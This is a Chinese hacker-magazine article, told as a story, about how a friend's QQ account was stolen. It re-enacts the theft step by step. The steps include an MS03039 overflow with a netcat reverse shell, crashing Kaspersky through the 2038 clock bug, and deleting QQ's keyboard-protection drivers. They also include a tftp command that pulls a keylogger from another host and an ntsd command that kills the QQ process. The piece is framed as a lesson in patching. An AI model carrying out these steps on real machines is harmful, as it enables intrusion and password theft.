不凡的黑客幻想　揭开ＱＱ号被盗的谜团

ＳＥＡＰＩＧ　ＬｉｌｙＢａｂｙ

猖狂的盗号者

“阿Q，你的QQ被盗了。”我平静地通知阿Q。

“你就忽悠我吧，大哥。”

“真的，不信你看：本号被盗，要想找回此号……”（图1）

正在打CS的阿Q，一骨碌就从桌子对面翻了过来：“不是吧，我装的可是卡巴斯基啊。”

怎么办？赶紧到http://service.qq.com/申诉，还好他记性比较好，填了申诉表里的一大堆问题，但是要三天之后才有答复。

当初是我推荐阿Q装卡巴斯基的，这下QQ号被盗了，我也挺过意不去。让他仔细回忆一下被盗经过，阿Q说曾经碰到一次QQ突然关了，以为程序出错所以再次登录，接着卡巴斯基也崩溃了。

找找被盗的原因

由此看来，遭遇盗号木马了。可令人不解的是，卡巴斯基怎么崩溃了呢？众所周知，卡巴斯基的进程保护相当强大，除了“冰刃”能“杀”掉其进程，无论是WinXP自带的NTSD还是大名鼎鼎的PSkill都奈何不了。留下的惟一线索就是系统时间被改成了2038年，也就是这一改动让卡巴斯基放水了。

说装了卡巴斯基，病毒木马入侵的几率比较小，那么系统漏洞的威胁就比较大了。用X-Scan一扫，MS03026、MS03039、MS03049、MS04011等高危溢出漏洞一大堆，惨不忍睹。

“你哪年装的系统啊？那么多重要的补丁都没打，想必这就是盗号者下手的地方了。”

“怎么下手？不凡你给我演示下，我要搞清楚，免得下次再中招。”

模拟第一现场

因为已经知道了阿Q的电脑上有很多漏洞没打补丁，我在自己的电脑上使用MS03039溢出工具，再加上NC反向连接，很轻松就获取了CMD Shell（图1）。具体方法请参考《激情溢出三部曲》（本刊今年2月上旬刊），在此不再赘述。

在获取C M D S h e l l 后， 用“tasklist”查看进程获知装有卡巴斯基。面对虎视眈眈的卡巴斯基，要想上传盗号工具难于上青天，关键在于卡巴斯基的相关进程没法终止。可最近卡巴斯基爆出了2038漏洞，只要修改一下时间，卡巴斯基就崩溃了，这就给了盗号者可乘之机（以下乃模拟盗号情景，切勿模仿）。

我又从硬盘里找出两个工具，《窗口键盘记录器》和TFTP32，前者用于捕捉键盘记录，用后者把它送到阿Q的电脑里去。

将《窗口键盘记录器》主程序keylog放至TFTP32所在目录，运行TFTP32开启FTP服务（图3）。图标还在，给人还在运行的假象。

QQ2005 Beta3之后的版本对键盘输入采取了保护措施，使得键盘记录程序无法捕获输入字符。将QQ安装目录下的npkcrypt.vxd、npkcrypt.sys、npkcusb.sys三个文件删除后，键盘保护就失效了。再删除LoginUinList.dat，这样可以清除QQ记录的号码，在登录时要重新输入。

利用“tftp –i 192.168.1.9 GET keylog.e x e”命令将键盘记录程序上传至目标主机并运行。用tasklist命令获取QQ进程的P I D，再用“ntsd -c q -p PID”结束Q Q 进程。5分钟之后，将C : WindowsSystem32目录下的11111.txt拷贝过来，里面就有QQ账号和密码（图6）。

“这，这就被偷走了啊？” 阿Q目瞪口呆。

“对付不设防的电脑，那还不是轻而易举。快回去重装系统并打补丁吧。”

本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文。